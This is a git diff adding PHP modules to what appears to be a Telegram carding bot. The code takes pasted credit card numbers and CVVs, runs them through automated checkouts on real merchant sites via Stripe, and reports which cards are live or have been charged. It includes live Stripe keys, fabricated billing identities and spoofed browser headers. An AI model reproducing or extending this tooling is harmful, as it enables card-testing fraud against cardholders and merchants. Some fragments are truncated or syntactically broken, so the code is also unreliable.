+ $headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+ $postfield = '------WebKitFormBoundaryrwOwOa9IfBc5AZZl
+ Content-Disposition: form-data; name="quantity"
+
+ 1
+ ------WebKitFormBoundaryrwOwOa9IfBc5AZZl
+ Content-Disposition: form-data; name="add-to-cart"
+
+ 794
+ ------WebKitFormBoundaryrwOwOa9IfBc5AZZl--';
+
+ curl_setopt_array($curl, [
+ CURLOPT_URL => 'https://www.animalcontrolproducts.com/product/victor-mouse-glue-trap/',
+ CURLOPT_POST => 1,
+ CURLOPT_POSTFIELDS => $postfield,
+ CURLOPT_HTTPHEADER => $headers,
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ CURLOPT_COOKIEFILE => capture,
+ CURLOPT_COOKIEJAR => capture,
+ ]);
+ $exe2 = curl_exec($curl);
+
+ ##################################
+
+ $curl = curl_init();
+ $headers = array();
+ $headers[] = 'authority: www.animalcontrolproducts.com';
+ $headers[] = 'method: GET';
+ $headers[] = 'path: /cart/';
+ $headers[] = 'scheme: https';
+ $headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+ $headers[] = 'accept-language: en-US,en;q=0.9';
+ $headers[] = 'cache-control: max-age=0';
+ $headers[] = 'referer: https://www.animalcontrolproducts.com/product/victor-mouse-glue-trap/';
+ $headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+ $headers[] = 'sec-ch-ua-mobile: ?0';
+ $headers[] = 'sec-ch-ua-platform: "Windows"';
+ $headers[] = 'sec-fetch-dest: document';
+ $headers[] = 'sec-fetch-mode: navigate';
+ $headers[] = 'sec-fetch-site: same-origin';
+ $headers[] = 'sec-fetch-user: ?1';
+ $headers[] = 'upgrade-insecure-requests: 1';
+ $headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+
+ curl_setopt_array($curl, [
+ CURLOPT_URL => 'https://www.animalcontrolproducts.com/cart/',
+ CURLOPT_CUSTOMREQUEST => 'GET',
+ CURLOPT_HTTPHEADER => $headers,
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ CURLOPT_COOKIEFILE => capture,
+ CURLOPT_COOKIEJAR => capture,
+ ]);
+ $exe3 = curl_exec($curl);
+
+ ##################################
+
+ $curl = curl_init();
+ $headers = array();
+ $headers[] = 'authority: www.animalcontrolproducts.com';
+ $headers[] = 'method: GET';
+ $headers[] = 'path: /checkout/';
+ $headers[] = 'scheme: https';
+ $headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+ $headers[] = 'accept-language: en-US,en;q=0.9';
+ $headers[] = 'referer: https://www.animalcontrolproducts.com/cart/';
+ $headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+ $headers[] = 'sec-ch-ua-mobile: ?0';
+ $headers[] = 'sec-ch-ua-platform: "Windows"';
+ $headers[] = 'sec-fetch-dest: document';
+ $headers[] = 'sec-fetch-mode: navigate';
+ $headers[] = 'sec-fetch-site: same-origin';
+ $headers[] = 'sec-fetch-user: ?1';
+ $headers[] = 'upgrade-insecure-requests: 1';
+ $headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+
+ curl_setopt_array($curl, [
+ CURLOPT_URL => 'https://www.animalcontrolproducts.com/checkout/',
+ CURLOPT_CUSTOMREQUEST => 'GET',
+ CURLOPT_HTTPHEADER => $headers,
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ CURLOPT_COOKIEFILE => capture,
+ CURLOPT_COOKIEJAR => capture,
+ ]);
+ $exe4 = curl_exec($curl);
+ $nonce = t(st(g($exe4, ' 'https://www.animalcontrolproducts.com/?wc-ajax=update_order_review',
+ CURLOPT_POST => 1,
+ CURLOPT_POSTFIELDS => $postfield,
+ CURLOPT_HTTPHEADER => $headers,
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ CURLOPT_COOKIEFILE => capture,
+ CURLOPT_COOKIEJAR => capture,
+ ]);
+ $exe5 = curl_exec($curl);
+
+ #######################################
+
+ $curl = curl_init();
+ $headers = array();
+ $headers[] = 'authority: api.stripe.com';
+ $headers[] = 'method: POST';
+ $headers[] = 'path: /v1/payment_methods';
+ $headers[] = 'scheme: https';
+ $headers[] = 'accept: application/json';
+ $headers[] = 'accept-language: en-US,en;q=0.9';
+ $headers[] = 'content-type: application/x-www-form-urlencoded';
+ $headers[] = 'origin: https://js.stripe.com';
+ $headers[] = 'referer: https://js.stripe.com/';
+ $headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+ $headers[] = 'sec-ch-ua-mobile: ?0';
+ $headers[] = 'sec-ch-ua-platform: "Windows"';
+ $headers[] = 'sec-fetch-dest: empty';
+ $headers[] = 'sec-fetch-mode: cors';
+ $headers[] = 'sec-fetch-site: same-site';
+ $headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+ $postfield = 'type=card&billing_details[name]=Hyper+Slow&billing_details[address][city]=New+York&billing_details[address][country]=US&billing_details[address][line1]=Street+23&billing_details[address][postal_code]=10080&billing_details[address][state]=NY&billing_details[email]=levimc%40gmail.com&billing_details[phone]=4135247242&card[number]='.$cc.'&card[cvc]='.$cvv.'&card[exp_month]='.$mm.'&card[exp_year]='.$yy.'&guid=419fba21-1f10-43ee-bc1d-8aea3a306dfce5ed02&muid=6ee16854-ce7c-40b7-9a9c-95df30a7c6ba4e902d&sid=c44a74fd-e6fe-4d6e-bf78-1609648241b00ca1de&pasted_fields=number&payment_user_agent=stripe.js%2Fc6f2aaa66%3B+stripe-js-v3%2Fc6f2aaa66&time_on_page=407352&key=pk_live_51IO4umBNnveasp6tMVKpIC0DHJFZbdv3iDM3p7T7mwaxDFyunjJKDAD6OCQAuBhdwcE6pNOZF5NnP8iGozKr7X4u00Z5cQTVcD&_stripe_account=acct_1IO4umBNnveasp6t';
+
+ curl_setopt_array($curl, [
+ CURLOPT_URL => 'https://api.stripe.com/v1/payment_methods',
+ CURLOPT_POST => 1,
+ CURLOPT_POSTFIELDS => $postfield,
+ CURLOPT_HTTPHEADER => $headers,
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ CURLOPT_COOKIEFILE => capture,
+ CURLOPT_COOKIEJAR => capture,
+ ]);
+ $exe6 = curl_exec($curl);
+ $id = t(st(g($exe6, '"id": "','"')));
+
+ ##################################
+
+ $curl = curl_init();
+ $headers = array();
+ $headers[] = 'authority: www.animalcontrolproducts.com';
+ $headers[] = 'method: POST';
+ $headers[] = 'path: /?wc-ajax=checkout';
+ $headers[] = 'scheme: https';
+ $headers[] = 'accept: application/json, text/javascript, */*; q=0.01';
+ $headers[] = 'accept-language: en-US,en;q=0.9';
+ $headers[] = 'content-type: application/x-www-form-urlencoded; charset=UTF-8';
+ $headers[] = 'origin: https://www.animalcontrolproducts.com';
+ $headers[] = 'referer: https://www.animalcontrolproducts.com/checkout/';
+ $headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+ $headers[] = 'sec-ch-ua-mobile: ?0';
+ $headers[] = 'sec-ch-ua-platform: "Windows"';
+ $headers[] = 'sec-fetch-dest: empty';
+ $headers[] = 'sec-fetch-mode: cors';
+ $headers[] = 'sec-fetch-site: same-origin';
+ $headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+ $headers[] = 'x-requested-with: XMLHttpRequest';
+ $postfield = 'billing_first_name=Hyper&billing_last_name=Slow&billing_company=&billing_country=US&billing_address_1=Street+23&billing_address_2=&billing_city=New+York&billing_state=NY&billing_postcode=10080&billing_phone=4135247242&billing_email=levimc%40gmail.com&mailchimp_woocommerce_newsletter=1&shipping_first_name=&shipping_last_name=&shipping_company=&shipping_country=US&shipping_address_1=&shipping_address_2=&shipping_city=&shipping_state=WI&shipping_postcode=&order_comments=&shipping_method%5B0%5D=flexible_shipping_2_1&payment_method=stripe_cc&stripe_cc_token_key='.$id.'&stripe_cc_payment_intent_key=&terms=on&terms-field=1&woocommerce-process-checkout-nonce='.$nonce.'&_wp_http_referer=%2F%3Fwc-ajax%3Dupdate_order_review';
+
+ curl_setopt_array($curl, [
+ CURLOPT_URL => 'https://www.animalcontrolproducts.com/?wc-ajax=checkout',
+ CURLOPT_POST => 1,
+ CURLOPT_POSTFIELDS => $postfield,
+ CURLOPT_HTTPHEADER => $headers,
+ CURLOPT_FOLLOWLOCATION => 1,
+ CURLOPT_RETURNTRANSFER => 1,
+ CURLOPT_SSL_VERIFYPEER => 0,
+ CURLOPT_SSL_VERIFYHOST => 0,
+ CURLOPT_COOKIEFILE => capture,
+ CURLOPT_COOKIEJAR => capture,
+ ]);
+ $exe7 = curl_exec($curl);
+ $msg = st(json_decode($exe7, 1)['messages']);
+ $url1 = t(st(g($exe7, '"redirect":"','"')));
+ $url = stripslashes("$url1");
+ $url69 = t(st(g($url1,'#response=','')));
+ $repo = json_decode("$url69");
+ $info = curl_getinfo($ch);
+ $time = $info['total_time'];
+ $time = substr_replace($time, '',4);
+######################END OF CHECKER PART################################################################################
+
+
+ if(strpos($exe7, '#response=')) {
+ addTotal();
+ addUserTotal($userId);
+ addCVV();
+ addUserCVV($userId);
+ addCCN();
+ addUserCCN($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» Dead ❌
+ Response -» EXPIRED CARD OR SOMEOTHER SHIT
+ Gateway -» Stripe 8.50$ Chrg
+ Time -» $times
+
+ ------- Bin Info -------
+
+------- Bin Info -------
+Bank -» $bank
+Brand -» $schemename
+Type -» $typename
+Currency -» $currency
+Country -» $cname ($emoji - 💲$currency)
+Issuers Contact -» $phone
+----------------------------
+
+Checked By $firstname
+Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ elseif(strpos($exe7, 'The card has insufficient funds to complete the purchase.')) {
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CVV Matched [Credit Floor] ✅
+ Response -» Approved (Insufficient Funds)
+ Gateway -» Stripe 8.50$ Chrg
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+ elseif((substr_count($exe7, '"result":"success"') > 0) || (substr_count($exe7, '"redirect":"https"'))){
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CVV Matched [PAYMENT SUCCESS] ✅
+ Response -» Approved (CHARGED 8.50$)
+ Gateway -» Stripe 8.50$ Chrg
+ Response -» Proxy ($ip)
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ else{
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» Dead ❌
+ Response -» Card Was Declined
+ Gateway -» Stripe 8.50$ Chrg
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ }else{
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Cool! Fucking provide a CC to Check!!",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);
+ }
+ }
+}
+
+
+?>
\ No newline at end of file
diff --git a/modules/checker/hawf.php b/modules/checker/hawf.php
new file mode 100644
index 0000000..59e9ba7
--- /dev/null
+++ b/modules/checker/hawf.php
@@ -0,0 +1,431 @@
+$chat_id,
+ 'text'=>"[ANTI SPAM] Try again after $antispams.",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+ ]);
+ return;
+
+ }else{
+ $messageidtoedit1 = bot('sendmessage',[
+ 'chat_id'=>$chat_id,
+ 'text'=>"Wait for Result...",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+
+ ]);
+
+ $messageidtoedit = capture(json_encode($messageidtoedit1), '"message_id":', ',');
+ $lista = substr($message, 4);
+ $bin = substr($cc, 0, 6);
+
+ if(preg_match_all("/(\d{16})[\/\s:|]*?(\d\d)[\/\s|]*?(\d{2,4})[\/\s|-]*?(\d{3})/", $lista, $matches)) {
+ $creditcard = $matches[0][0];
+ $cc = multiexplode(array(":", "|", "/", " "), $creditcard)[0];
+ $mes = multiexplode(array(":", "|", "/", " "), $creditcard)[1];
+ $ano = multiexplode(array(":", "|", "/", " "), $creditcard)[2];
+ $cvv = multiexplode(array(":", "|", "/", " "), $creditcard)[3];
+
+
+##########################################################CHECKER PART#######################################################
+
+ /////////////////////////////////////////////////////////////////////////////////////
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
+ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+ curl_setopt($ch, CURLOPT_HTTPHEADER, array(
+ 'Host: lookup.binlist.net',
+ 'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
+ 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'));
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_POSTFIELDS, '');
+ $fim = curl_exec($ch);
+ $bank = capture($fim, '"bank":{"name":"', '"');
+ $cname = capture($fim, '"name":"', '"');
+ $brand = capture($fim, '"brand":"', '"');
+ $country = capture($fim, '"country":{"name":"', '"');
+ $phone = capture($fim, '"phone":"', '"');
+ $scheme = capture($fim, '"scheme":"', '"');
+ $type = capture($fim, '"type":"', '"');
+ $emoji = capture($fim, '"emoji":"', '"');
+ $currency = capture($fim, '"currency":"', '"');
+ $binlenth = strlen($bin);
+ $schemename = ucfirst("$scheme");
+ $typename = ucfirst("$type");
+
+
+ /////////////////////==========[Unavailable if empty]==========////////////////
+
+
+ if (empty($schemename)) {
+ $schemename = "Unavailable";
+ }
+ if (empty($typename)) {
+ $typename = "Unavailable";
+ }
+ if (empty($brand)) {
+ $brand = "Unavailable";
+ }
+ if (empty($bank)) {
+ $bank = "Unavailable";
+ }
+ if (empty($cname)) {
+ $cname = "Unavailable";
+ }
+ if (empty($phone)) {
+ $phone = "Unavailable";
+ }
+ ///////////////////////////////////////////////////////////////////////////////////////////////////////
+ if(file_exists(getcwd().('/cookie.txt'))){
+ @unlink('cookie.txt');
+ }
+#------[Email Generator]------#
+
+function emailGenerate($length = 10)
+{
+ $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
+ $charactersLength = strlen($characters);
+ $randomString = '';
+ for ($i = 0; $i < $length; $i++) {
+ $randomString .= $characters[rand(0, $charactersLength - 1)];
+ }
+ return $randomString . '@gmail.com';
+}
+$email = emailGenerate();
+
+#------[CC Type Randomizer]------#
+
+ $cardNames = array(
+ "3" => "American Express",
+ "4" => "Visa",
+ "5" => "MasterCard",
+ "6" => "Discover"
+ );
+ $card_type = $cardNames[substr($cc, 0, 1)];
+
+#------[Rand]------#
+
+$DET = file_get_contents("https://namegenerator.in/assets/refresh.php?location=united-states");
+$data = json_decode($DET, true);
+$fname = explode(" ", $data['name'])[0];
+$lname = explode(" ", $data['name'])[1];
+
+$first = ucfirst(str_shuffle('Lucas'));
+$last = ucfirst(str_shuffle('Noob'));
+$street = trim(strip_tags(getStr($DET,'"street":"','"')));
+$city = trim(strip_tags(getStr($DET,'"city":"','"')));
+$state = trim(strip_tags(getStr($DET,'"state":"','"')));
+$Zip = trim(strip_tags(getStr($DET,'"postcode":',',"')));
+$seed = trim(strip_tags(getStr($DET,'"seed":"','"')));
+$ph = array("682","346","246");
+$ph1 = array_rand($ph);
+$phh = $ph[$ph1];
+$phone = "$phh".rand(0000000,9999999)."";
+$numero1 = substr($phone, 1,3);
+$numero2 = substr($phone, 6,3);
+$numero3 = substr($phone, 6,4);
+
+/*
+Product Page => https://www.browserstack.com/pricing
+*/
+
+#------[GET]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, 'https://www.browserstack.com/pricing');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+$headers = array();
+$headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'referer: https://www.browserstack.com/pricing';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+$get = curl_exec($ch);
+
+// Authenticity Token
+$ato = trim(strip_tags(getStr($get,'')));
+curl_close($ch);
+
+#------[CURL-1]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, 'https://accounts.browserstack.com/combined_line_items/buy?plan_id=105308');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'content-type: application/x-www-form-urlencoded';
+$headers[] = 'origin: https://www.browserstack.com';
+$headers[] = 'referer: https://www.browserstack.com/';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, 'authenticity_token='.urlencode($ato).'');
+$curl1 = curl_exec($ch);
+// Authenticity Token 2
+$ato2 = trim(strip_tags(getStr($curl1,'')));
+// Windwos Token
+$wind = trim(strip_tags(getStr($curl1,'')));
+curl_close($ch);
+
+#------[CURL-2]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, 'https://www.browserstack.com/users');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'accept: application/json';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'content-type: application/x-www-form-urlencoded; charset=UTF-8';
+$headers[] = 'origin: https://www.browserstack.com';
+$headers[] = 'referer: https://www.browserstack.com/orders/new';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36';
+$headers[] = 'x-csrf-token: '.$ato2.'';
+$headers[] = 'x-requested-with: XMLHttpRequest';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, 'utf8=%E2%9C%93&authenticity_token='.urlencode($ato2).'&user%5Bemail%5D='.$fname.''.$c4.'%40mailbox.in.ua&user%5Bpassword%5D=Q'.$first.'%24%231&user%5Bfull_name%5D='.$first.'+'.$last.'&user%5Bgroup_attributes%5D%5Bname%5D=&terms_and_conditions=on&checkout_page=checkout_page&gaLoaded=true&authenticity_token='.urlencode($wind).'');
+$curl2 = curl_exec($ch);
+curl_close($ch);
+
+#------[CURL-2]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, 'https://api.stripe.com/v1/tokens');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'accept: application/json';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'content-type: application/x-www-form-urlencoded';
+$headers[] = 'origin: https://js.stripe.com';
+$headers[] = 'referer: https://js.stripe.com/';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, 'card[name]='.$first.'+'.$last.'&card[address_zip]=94903&card[address_country]=US&card[number]='.$cc.'&card[cvc]='.$cvv.'&card[exp_month]='.$mes.'&card[exp_year]='.$ano.'&guid=9fcbe477-3e7a-4a75-8e1b-8198dc0e3d6389a832&muid=900eafb0-baca-4d69-9373-2b9ed2c8e427232d3b&sid=6c7d5c48-eb12-404e-b477-5b0165cc943421108a&payment_user_agent=stripe.js%2F6c868a0c6%3B+stripe-js-v3%2F6c868a0c6&time_on_page=467626&key=pk_live_40g8bjuzvlOrPg0e4GbbFvkQrPiYzgplKZrJtYsBM1XSJbzF6GomYcwBZgh6qHpDUQ0CcvxLwc9OmGiddh6x75pBH00t2o6h0G1&pasted_fields=number');
+$curl2 = curl_exec($ch);
+
+// Stripe iD
+$id = trim(strip_tags(getStr($curl2,'"id": "','"')));
+curl_close($ch);
+
+#------[CURL-3]------#
+
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, 'https://accounts.browserstack.com/orders');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'accept: text/javascript, application/json';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'content-type: application/x-www-form-urlencoded; charset=UTF-8';
+$headers[] = 'origin: https://www.browserstack.com';
+$headers[] = 'referer: https://www.browserstack.com/';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36';
+$headers[] = 'x-csrf-token: '.$ato2.'';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, 'utf8=%E2%9C%93&authenticity_token='.urlencode($wind).'&is_from_checkout_page=true&is_tax_checkout_page=true&stripeToken='.$id.'&cardDetails='.$first.'+'.$last.'-'.$card_type.'-'.$c4.'-'.$mes.'-'.$ano.'-US-94903&authenticity_token='.urlencode($wind).'');
+$result = curl_exec($ch);
+
+ $info = curl_getinfo($ch);
+ $time = $info['total_time'];
+ $time = substr_replace($time, '',4);
+ // Response
+ $respo = trim(strip_tags(getStr($curl5,'"error":"','"')));
+ echo "Response: $curl5
";
+ //echo "ID: $id
";
+######################END OF CHECKER PART################################################################################
+
+
+ if(substr_count($result, "Invalid zip / postcode"))){
+ addTotal();
+ addUserTotal($userId);
+ addCVV();
+ addUserCVV($userId);
+ addCCN();
+ addUserCCN($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+Status -» CVV Matched [AVS Failure] ✅
+Response -» Approved ( The zip code you supplied failed validation. ))){)
+Gateway -» Stripe Auth
+Time -» $times
+
+------- Bin Info -------
+Bank -» $bank
+Brand -» $schemename
+Type -» $typename
+Currency -» $currency
+Country -» $cname ($emoji - 💲$currency)
+Issuers Contact -» $phone
+----------------------------
+
+Checked By $firstname
+Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ elseif(strpos($result, 'Your card has insufficient funds.')) {
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CVV Matched [Credit Floor] ✅
+ Response -» Approved (Insufficient Funds)
+ Gateway -» Stripe Auth
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+ elseif(strpos($result, "Your CVV number is incorrect. Please try again")) {
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
